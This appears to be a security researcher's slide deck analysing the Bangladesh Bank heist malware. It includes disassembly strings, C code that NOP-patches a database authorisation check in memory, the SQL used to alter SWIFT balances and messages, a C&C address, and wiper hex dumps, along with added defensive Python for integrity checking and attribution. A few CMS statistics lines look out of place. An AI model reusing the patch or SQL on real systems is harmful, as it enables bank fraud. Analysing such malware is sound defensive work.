Copyright 2016 BAE Systems. All Rights Reserved.

BAE Systems
The evolution of financial malware: Bangladesh Bank Heist Case Study
Sergei Shevchenko (Security Researcher, BAE Systems Applied Intelligence)
.data:0040F818 20 32 30 3A 20 54 72 61  a20Transactio_0  db ' 20: Transaction',0                ; DATA XREF: sub_406B40
.data:0040F83C 46 45 44 45 52 41 4C 20  Str              db 'FEDERAL RESERVE BANK',0
.data:0040F8A4 46 49 4E 20 39 30 30 20  aFin900Confirma  db 'FIN 900 Confirmation of Debit',0
.data:0040F8EC 63 6D 64 2E 65 78 65 20  aCmd_exeCEchoEx  db 'cmd.exe /c echo exit | "%s" VS / as sysdba @%s > "%s"',0
.data:0040F484 53 45 4C 45 43 54 20 4D  aSelectMesg_fin  db 'SELECT MESG_FIN_CCY_AMOUNT FROM SAAOWNER.MESG_%s WHERE MESG_S_UMI'
.data:0040F484 43 43 59 5F 41 4D 4F 55                   db 'D = ',27h,'%s',27h,';',0
.data:0040F18C 6C 69 62 6F 72 61 64 62  aLiboradb_dll    db 'liboradb.dll',0                     ; DATA XREF: patch_liboradb_dll+F2o
.data:0040F0D4 41 6C 6C 69 61 6E 73 00  aAllians         db 'Allians',0                          ; DATA XREF: make_paths+32o
.data:0040F220 53 45 4C 45 43 54 20 43  aSelectC_text_s  db 'SELECT C.TEXT_S_UMID FROM (SELECT A.TEXT_S_UMID, A.TEXT_DATA_BLOC'
.data:0040F220 54 20 41 2E 54 45 58 54                   db ' = B.MESG_S_UMID AND B.MESG_SENDER_SWIFT_ADDRESS LIKE ',27h,'%%%s%%',27h
.data:0048F478 25 2E 32 49 36 34 64 00  a_2i64d          db '%.2I64d',0                          ; DATA XREF: sub_45A500+6Fo
.data:0048F480 4D 61 00                 aMa              db 'Ma',0                               ; DATA XREF: sub_45A760+9Ao
.data:0048F483 00                                        align 4
               3A 20 53 74 61 74 65 6D  aStatementLine   db ': Statement Line',0                 ; DATA XREF: sub_45A760+5Co
               00 00 00                                  align 4
               43 6C 6F 73 69 6E 67 20  aClosingBalance  db 'Closing Balance (Booked Funds)',0
.data:0048F498 42 61 6C 61 6E 63 65 20                                                            ; DATA XREF: sub_45A880+5Do
.data:0048F4B8 50 4F 53 5F 54 45 4D 50  aPos_temp        db 'POS_TEMP',0                         ; DATA XREF: sub_45A880+36o
.data:0048F4B8 00                                                                                  ; sub_45A880+109o ...
.data:0048F4C4 2D 2D 2D 2D 2D 2D 2D 2D  asc_48F4C4       db '---------------------',0
.data:0048F4C4 2D 2D 2D 2D 2D 2D 2D 2D                                                            ; DATA XREF: sub_45A9C0+D1o
.data:0048F4C4 2D 2D 2D 2D 2D 00                                                                   ; sub_45B630+1A0o
.data:0048F4DC 20 4F 70 65 6E 69 6E 67  aOpeningBalance  db ' Opening Balance',0                 ; DATA XREF: sub_45AAE0:loc_45AAFBo
.data:0048F4ED 00 00 00                                  align 10h
.data:0048F4F0 53 65 6E 64 65 72 00     aSender          db 'Sender',0                           ; DATA XREF: sub_45AB80:loc_45ABA0o
.data:0048F4F7 00                                        align 4
.data:0048F4F8 23 25 73 23 00           aS_5             db '#%s#',0                             ; DATA XREF: sub_45AC00+117o
.data:0048F4FD 00 00 00                                  align 10h
.data:0048F500 3A 20 44 65 62 69 74 00  aDebit_0         db ': Debit',0                          ; DATA XREF: sub_45AC00+E5o
.data:0048F508 3A 20 43 72 65 64 69 74  aCredit          db ': Credit',0                         ; DATA XREF: sub_45AC00+CEo
.data:0048F508 00                                                                                  ; sub_45AC00+234o ...
.data:0048F511 00 00 00                                  align 4
.data:0048F514 20 44 65 62 69 74 00     aDebit           db ' Debit',0                           ; DATA XREF: sub_45AC00+94o
.data:0048F51B 00                                        align 4
.data:0048F51C 50 4F 53 5F 50 41 47 45  aPos_page_start  db 'POS_PAGE_START',0                   ; DATA XREF: sub_45B210+51o
.data:0048F51C 5F 53 54 41 52 54 00                                                                ; sub_45B210+E0o ...
.data:0048F52B 00                                        align 4
.data:0048F52C 20 43 72 65 64 69 74 00  aCredit_0        db ' Credit',0                          ; DATA XREF: sub_45B3D0+DAo
.data:0048F534 3A 20 43 6C 6F 73 69 6E  aClosingAvailBa  db ': Closing Avail Bal (Avail Funds)',0
.data:0048F534 67 20 41 76 61 69 6C 20                                                            ; DATA XREF: sub_45B630+261o
.data:0048F556 00 00                                     align 4
.data:0048F558 4D 65 73 73 61 67 65 20  aMessageTrailer  db 'Message Trailer',0                  ; DATA XREF: sub_45B630+1F8o
.data:0048F568 4D 65 73 73 61 67 65 20  aMessageText     db 'Message Text',0                     ; DATA XREF: sub_45B630+1E2o
.data:0048F575 00 00 00                                  align 4
.data:0048F578 4D 65 73 73 61 67 65 20  aMessageHeader   db 'Message Header',0                   ; DATA XREF: sub_45B630+1CCo
.data:0048F587 00                                        align 4
.data:0048F588 49 6E 73 74 61 6E 63 65  aInstanceTypeAn  db 'Instance Type and Transmission',0
.data:0048F588 20 54 79 70 65 20 61 6E                                                            ; DATA XREF: sub_45B630+1B6o
.data:0048F588 64 20 54 72 61 6E 73 6D                                                            ; PARSE_PDF:loc_45BBC0o

<rpcgroup>..<rpci>..*/bbw/cmserver/*..217.172.177.12/redirect.php..<ssq>1</ssq>
Sergei Shevchenko, Cyber Security Research
The Evolution of Financial Malware: Bangladesh Bank Heist Case Study
1/3 out of 10 mln websites run CMS
31,581 PLUGINS
>100 VULNERABILITIES FIXED SINCE 2008
Organised Cyber Crime > Targeting Different Levels of the Society
Ordinary People: ZeuS/Carberp, Dridex/Dyre
The Rise of POS Malware > ATM Malware
Early signs of such diversification efforts were noticed back in 2009.
Insiders or corrupt technical support employees infected a number of Diebold ATMs (running Windows XP), allowing the attackers to instruct the infected ATMs to dispense cash.
The Rise of POS Malware > POS Malware (BlackPOS etc.)
Organised Cyber Crime > Targeting Different Levels of the Society
ATM/POS: ATM/POS Malware
2015: Carbanak, an attack from inside > Attack against a Bank Infrastructure
In 2015, a new breed of malware, Carbanak, was found and reported by Kaspersky Lab.
The malware and the group of attackers behind it were able to compromise up to 100 financial institutions from the inside.
Not only did they manage to steal information about thousands of private customers, but they were also able to remotely instruct ATMs to dispense cash, leading to substantial financial losses.
Organised Cyber Crime > Targeting Different Levels of the Society
Bank Infrastructure: Carbanak
Life imitating Art
HOLLYWOOD (2001): $150M
CYBER SPACE (2016): $951M
Schematics of Cyber Heist > Compromised Bank Operation
(diagram: US Bank; Compromised Bank, Corr. Account; Offshore Bank)
Bangladesh Bank Heist > Patch
3. Malware checks to see if any processes have the 'liboradb.dll' module loaded
4. If found, it overwrites 2 bytes at a specific offset with 'do nothing' (0x90, NOP) instructions
5. The overwritten bytes force the host application to always pass the validity check
6. The malware is now able to execute database transactions
    if (VirtualProtectEx(hProcess, lpAddr, 2, PAGE_EXECUTE_READWRITE, (PDWORD)&hProcess) &&
        ReadProcessMemory(hProcess, lpAddr, &buffer, 2, &dwRead))
    {
        if (bPatch)
        {
            if ((WORD)buffer == JNZ)
                res = WriteProcessMemory(hProcess, lpAddr, &NOPs, 2, &dwWritten);
        }
        else
        {
            if ((WORD)buffer == NOPs)
                res = WriteProcessMemory(hProcess, lpAddr, &JNZ, 2, &dwWritten);
        }
        if (res)
            VirtualProtectEx(hProcess, lpAddr, 2, hProcess, &flOldProtect);
    }
.data:0040F170 NOPs db 90h
.data:0040F171 db 90h
.data:0040F174 JNZ db 75h
.data:0040F175 db 4
Bangladesh Bank Heist > Patch Result

Original Code:
    85 C0           test eax, eax   ; DB authorisation check
    75 04           jnz  failed     ; if failed, jump to 'failed' label below
    33 C0           xor  eax, eax   ; otherwise, set result to 0 (success)
    EB 17           jmp  exit       ; and then exit
  failed:
    B8 01 00 00 00  mov  eax, 1     ; set result to 1 (failure)

Patched Code:
    85 C0           test eax, eax   ; DB authorisation check
    90              nop             ; 'do nothing' in place of 0x75
    90              nop             ; 'do nothing' in place of 0x04
    33 C0           xor  eax, eax   ; always set result to 0 (success)
    EB 17           jmp  exit       ; and then exit
  failed:
    B8 01 00 00 00  mov  eax, 1     ; never reached: set result to 1 (failure)
Bangladesh Bank Heist > Patch
(flowchart: "Authorised?" decision with NO and YES branches; Full Access; DataBase; Do Nothing; Do Nothing)
Bangladesh Bank Heist > Replacing the 2 bytes affects 8 bits only
  75 04 = 01110101 00000100
  90 90 = 10010000 10010000
What's easier to flip? This? Or this?
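As an added example (not code from the slides or from BAE Systems), the following Python models the integrity check a defender can run over a code region of a loaded module: compare the bytes read back from process memory with the bytes expected from the on-disk image, locate any run that was replaced with NOPs, and count the flipped bits. The 13-byte sequence is the original code from the 'Patch Result' slide; the patched copy is constructed here by applying the two-byte replacement the slide describes, and the function names are this example's own.

```python
# Added example (not from the slides): integrity check for an in-memory code
# region, using the byte sequence listed on the 'Patch Result' slide:
#   85 C0  test eax,eax | 75 04  jnz failed | 33 C0  xor eax,eax |
#   EB 17  jmp exit     | B8 01 00 00 00  mov eax,1
ORIGINAL = bytes.fromhex("85C0 7504 33C0 EB17 B801000000")

# The replacement described on the slide: 'jnz failed' (75 04) -> two NOPs (90 90).
JNZ, NOPS = b"\x75\x04", b"\x90\x90"


def apply_nop_patch(code: bytes, offset: int) -> bytes:
    """Construct the patched copy: replace the 2-byte jnz at `offset` with NOPs."""
    if code[offset:offset + 2] != JNZ:
        raise ValueError("no 'jnz rel8' with displacement 4 at that offset")
    return code[:offset] + NOPS + code[offset + 2:]


def flipped_bits(a: bytes, b: bytes) -> int:
    """Hamming distance in bits between two equal-length byte strings."""
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


def find_modifications(expected: bytes, observed: bytes) -> list:
    """Report every run of bytes where the memory image (`observed`) deviates
    from the reference bytes (`expected`), with the features that make the
    'conditional jump turned into a NOP sled' pattern stand out."""
    if len(expected) != len(observed):
        raise ValueError("regions must be the same length")
    findings, start = [], None
    for i in range(len(expected) + 1):
        differs = i < len(expected) and expected[i] != observed[i]
        if differs and start is None:
            start = i
        elif not differs and start is not None:
            orig, now = expected[start:i], observed[start:i]
            findings.append({
                "offset": start,
                "original": orig.hex(),
                "observed": now.hex(),
                "nop_sled": set(now) == {0x90},                 # only 'do nothing' bytes
                "was_cond_jump": len(orig) == 2 and 0x70 <= orig[0] <= 0x7F,  # Jcc rel8
                "bits_flipped": flipped_bits(orig, now),
            })
            start = None
    return findings
```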
Bangladesh Bank Heist > SQL queries

Manipulating balances (the amount of Convertible Currency):
    UPDATE SAAOWNER.MESG_%s SET MESG_FIN_CCY_AMOUNT = '%s' WHERE MESG_S_UMID = '%s'

Sending 'doctored' (manipulated) SWIFT confirmation messages for local printing:
    UPDATE SAAOWNER.TEXT_%s SET TEXT_DATA_BLOCK = UTL_RAW.CAST_TO_VARCHAR2('%s') WHERE TEXT_S_UMID = '%s'

Monitoring Login/Logout events in the journal:
    SELECT * FROM (SELECT JRNL_DISPLAY_TEXT, JRNL_DATE_TIME FROM SAAOWNER.JRNL_%s WHERE JRNL_DISPLAY_TEXT LIKE '%%LT BBHOBDDHA: Log%%' ORDER BY JRNL_DATE_TIME DESC) A WHERE ROWNUM = 1

'BBHOBDDH' is the SWIFT code for the Bangladesh Bank in Dhaka.

GET: [C&C_server]/al?tttO
Cyber Heist: Vietnam
(diagram of the trojanised reader's processing flow; labels as shown on the slide)
  SWIFT Service Bureau (was not compromised); Fraudulent Requests; Received PDF Statement
  User opens the PDF File
  Trojan reads PDF File, converts into XML; XML File (Temporary File): read blocks one by one, ignore blocks with MESSAGE_FILENAME
  Trojan reads XML, converts into PDF; Modified PDF File
  Pass Modified PDF File to Foxit Reader; User opens the Modified PDF File
Attribution clues
Distinctive 2-step 'wipe-out' and 'file-delete' functions:
---> which led to a further sample: msoutc.exe (c6eb8e46810f5806d056c4aa34e7b8d8a2c37cad)
Attribution

Wipe-out function (msoutc.exe, 2014):
B820100000E8B64E0000535557FF150090400050FF154C90400083C404C644240CFFFF156890400025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF15A4AC40008BE883FDFF7510FF151C9040005F5D5B81C420100000C3566A02536AFF55FF15D4AC40008D4C242453518D5424386A015255FF15ACAC400055FF15C8AC4000
1EFFFFFF55FF15A8AC40008B9424341000005352E847FDFFFF83C4085E5F5D5B

Wipe-out function (Vietnam malware, 2015):
B820100000E896EA0400535557FF154CF0450050FF152CF1450083C404C644240CFFFF1524F1450025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF1548F045008BE883FDFF7510FF1508F045005F5D5B81C420100000C3566A02536AFF55FF1544F045008D4C242453518D5424386A015255FF1540F0450055FF153CF04500
1EFFFFFF55FF1510F045008B9424341000005352E847FDFFFF83C4085E5F5D5B

Only the call operands differ (2014 -> 2015):
  B64E00 -> 96EA04    009040 -> 4CF045    4C9040 -> 2CF145
  689040 -> 24F145
  A4AC40 -> 48F045    1C9040 -> 08F045
  D4AC40 -> 44F045    ACAC40 -> 40F045    C8AC40 -> 3CF045
  A8AC40 -> 10F045
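As an added example (this code is not from the slides or from BAE Systems), the following Python reproduces the comparison behind the attribution argument: the two wipe-out function dumps shown above are embedded verbatim, the differing bytes are located, and each differing run is checked against the rule that it must lie inside the 4-byte operand of a preceding E8 (call rel32) or FF 15 (call through an import pointer). The function names and the classification rule are this example's own.

```python
# Added example (not from the slides): positional byte diff of the two wipe-out
# function dumps, showing that they differ only in call/import addresses.
# Hex strings are copied verbatim from the slide (two fragments per sample).
MSOUTC_2014 = [
    "B820100000E8B64E0000535557FF150090400050FF154C90400083C404C644240CFFFF156890400025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF15A4AC40008BE883FDFF7510FF151C9040005F5D5B81C420100000C3566A02536AFF55FF15D4AC40008D4C242453518D5424386A015255FF15ACAC400055FF15C8AC4000",
    "1EFFFFFF55FF15A8AC40008B9424341000005352E847FDFFFF83C4085E5F5D5B",
]
VIETNAM_2015 = [
    "B820100000E896EA0400535557FF154CF0450050FF152CF1450083C404C644240CFFFF1524F1450025FF0000807907480D00FFFFFF408844240DB9FF03000033C08D7C242DC644242C5F33DBF3AB66AB5368800000006A0353AA8B84244010000053680000004050C644242AFF885C242BC644242C7EC644242DE7FF1548F045008BE883FDFF7510FF1508F045005F5D5B81C420100000C3566A02536AFF55FF1544F045008D4C242453518D5424386A015255FF1540F0450055FF153CF04500",
    "1EFFFFFF55FF1510F045008B9424341000005352E847FDFFFF83C4085E5F5D5B",
]


def diff_runs(a: bytes, b: bytes) -> list:
    """Maximal runs [(start, end_inclusive)] at which a and b differ."""
    if len(a) != len(b):
        raise ValueError("fragments must have equal length for a positional diff")
    runs, start = [], None
    for i in range(len(a) + 1):
        differs = i < len(a) and a[i] != b[i]
        if differs and start is None:
            start = i
        elif not differs and start is not None:
            runs.append((start, i - 1))
            start = None
    return runs


def classify(code: bytes, run: tuple) -> str:
    """Name the operand a differing run sits in: the rel32 of E8 (call), the
    disp32 of FF 15 (call [addr], i.e. an import-table call), or 'other'."""
    s, e = run
    for j in range(s - 1, max(s - 5, -1), -1):      # opcode at most 4 bytes back
        if code[j] == 0xE8:
            kind = "call rel32"
        elif j >= 1 and code[j - 1] == 0xFF and code[j] == 0x15:
            kind = "call [imm32]"
        else:
            continue
        if j + 1 <= s and e <= j + 4:                # run lies inside that operand
            return kind
    return "other"


def compare_fragments(hex_a: str, hex_b: str) -> dict:
    a, b = bytes.fromhex(hex_a), bytes.fromhex(hex_b)
    runs = diff_runs(a, b)
    kinds = [classify(a, r) for r in runs]
    return {"bytes": len(a), "differing_bytes": sum(e - s + 1 for s, e in runs),
            "runs": len(runs), "kinds": kinds, "unexplained": kinds.count("other")}


def attribution_report() -> list:
    """One summary per fragment pair; 'unexplained' must be 0 for the
    'same code, relinked against different addresses' conclusion to hold."""
    return [compare_fragments(a, b) for a, b in zip(MSOUTC_2014, VIETNAM_2015)]
```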
Attribution
(timeline diagram, DEC 2015 to APR 2016; labels as shown on the slide)
Sources: US-CERT Alert; PwC; msoutc.exe
Shared artefacts:
  FwtSqmSession106829323_S-1-5-19
  FwtSqmSession106839323_S-1-5-20
  y0uar3@s!llyid!07,ou74n60u7f001
  y@s!11yid60u7f!07ou74n001
Vietnam (Tien Phong Bank: Heist Attempt): Foxit Reader.exe, mspdclr.exe (Trojanised Foxit Reader / SWIFT Message Cleaner)
Bangladesh (Bangladesh Bank Heist): evtsys.exe, evtdiag.exe, nroff_b.exe (Main Malware used in Bangladesh Heist)
Compiled / Discovered events: 4-Dec-2015, 8-Dec-2015, 16-Dec-2015, 22-Dec-2015, 4-Feb-2016 / 5-Feb-2016, 28-Feb-2016, 25-Mar-2016
Timeline of the attacks: Group #1 (Unknown)
Late 2014 to 2015
Malware:
  • exe compiled from Python scripts:
    • pyinstaller generated exe files
    • python scripts fetch/execute shellcode
  • 'legit' remote access tools:
    • 'Atelier Web Remote Commander'
    • 'Anyplace Control'
  • 'legit' Veil Framework
Ecuador
Timeline of the attacks: Group #2 (Lazarus)
Vietnam: December 2015
Malware:
  • Manipulation of the PDF statements from the bank's Service Bureau
Vietnam
Timeline of the attacks: Group #2 (Lazarus)
Bangladesh: February 2016
Malware:
  • SWIFT messages manipulation
  • Compromises SWIFT Alliance Software
  • Direct DB manipulation
Bangladesh
Timeline of the attacks: Group #3 (Carbanak)
April 2016
Infection Vector:
  • Spear-Phishing, RIG Exploit Kit
Malware:
  • MBR code, wipes out HDD
  • Backdoor Shellcode, port 8888 (open source)
  • "Toshliph": links to Carbanak
Targets:
  • ATMs
  • E-payment systems
  • online-banking
Ukraine
Hong Kong
Taiwan (China)
Thailand
We're now working with SWIFT to investigate new cases.